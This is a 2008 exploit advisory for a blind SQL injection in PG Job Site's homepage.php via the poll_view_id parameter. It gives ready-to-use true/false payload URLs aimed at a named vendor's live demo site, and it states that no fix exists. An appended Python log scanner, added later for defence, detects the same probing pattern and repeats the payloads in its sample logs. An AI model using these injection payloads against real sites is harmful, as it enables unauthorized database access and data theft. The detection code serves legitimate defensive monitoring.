PG Job Site (poll_view_id) Blind SQL Injection Vulnerability

2008-11-23 22:00:03

[~] PG Job Site homepage.php (poll_view_id) Blind Sql inj.
[~]
[~]----------------------------------------------------------
[~] Discovered By: ZoRLu msn: [email protected]
[~]
[~] Date: 23.11.2008
[~]
[~] Home: www.z0rlu.blogspot.com
[~]
[~] A small request: please do not hack the demos
[~]
[~] NOTE: LONELINESS LOST ITS MEANING IN MY LONELINESS : ( (
[~]
[~] NOTE: a.q a.q a.q a.q a.q a.q a.q a.q a.q limit(a.q)=infinity ( I am fed up )
[~] -----------------------------------------------------------

Exploit for demo (you must log in to the site first, then test these links; look on the left for the two links):

http://www.jobsoftpro.com/demo/homepage.php?action=results&poll_ident=6&poll_view_id=6+and+substring(@@version,1,1)=4 ( true )

http://www.jobsoftpro.com/demo/homepage.php?action=results&poll_ident=6&poll_view_id=6+and+substring(@@version,1,1)=5 ( false )

[~]----------------------------------------------------------------------
[~] Greetz tO: str0ke & all Muslim HaCkeRs
[~]
[~] yildirimordulari.org & darkc0de.com
[~]
[~]----------------------------------------------------------------------
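
Added example, not part of the original advisory or of PG Job Site's code: a log check for the true/false request pattern shown above. It flags non-numeric values in poll_ident and poll_view_id and lists clients that send two or more different conditions in the same parameter. The combined access-log format, the sample log lines and all function names are assumptions made for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Parameters that carry plain integers in the advisory's URLs.
NUMERIC_PARAMS = ("poll_ident", "poll_view_id")
# Assumption: combined-format access log; captures client IP and request target.
LOG_RE = re.compile(r'^(?P<ip>\S+) .*?"(?:GET|POST) (?P<target>\S+) HTTP/[\d.]+"')

# Constructed sample log lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = """\
192.0.2.10 - - [23/Nov/2008:22:00:01 +0000] "GET /homepage.php?action=results&poll_ident=6&poll_view_id=6 HTTP/1.1" 200 5120
198.51.100.7 - - [23/Nov/2008:22:00:02 +0000] "GET /homepage.php?action=results&poll_ident=6&poll_view_id=6+and+substring(@@version,1,1)=4 HTTP/1.1" 200 5120
198.51.100.7 - - [23/Nov/2008:22:00:03 +0000] "GET /homepage.php?action=results&poll_ident=6&poll_view_id=6%20and%20substring(@@version,1,1)=5 HTTP/1.1" 200 4096
203.0.113.5 - - [23/Nov/2008:22:00:04 +0000] "GET /homepage.php?action=results&poll_ident=6&poll_view_id=abc HTTP/1.1" 200 4096
"""

def suspicious_params(target):
    """Return (name, decoded value) pairs where a numeric parameter is not all digits."""
    query = parse_qs(urlsplit(target).query, keep_blank_values=True)
    return [(name, value)
            for name in NUMERIC_PARAMS
            for value in query.get(name, [])
            if value and not re.fullmatch(r"[0-9]+", value)]

def scan(log_text):
    """Map each client IP to the non-numeric values it sent, in log order."""
    findings = defaultdict(list)
    for line in log_text.splitlines():
        match = LOG_RE.match(line)
        if match:
            findings[match.group("ip")].extend(suspicious_params(match.group("target")))
    return {ip: hits for ip, hits in findings.items() if hits}

def blind_probe_clients(findings):
    """Clients that sent two or more distinct conditions in the same parameter,
    the request pattern of a true/false (boolean-based blind) test."""
    clients = []
    for ip, hits in findings.items():
        per_param = defaultdict(set)
        for name, value in hits:
            per_param[name].add(value)
        if any(len(values) >= 2 for values in per_param.values()):
            clients.append(ip)
    return sorted(clients)

if __name__ == "__main__":
    found = scan(SAMPLE_LOG)
    print(found)
    print("blind-probe pattern:", blind_probe_clients(found))
```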


Fixes

No fixes
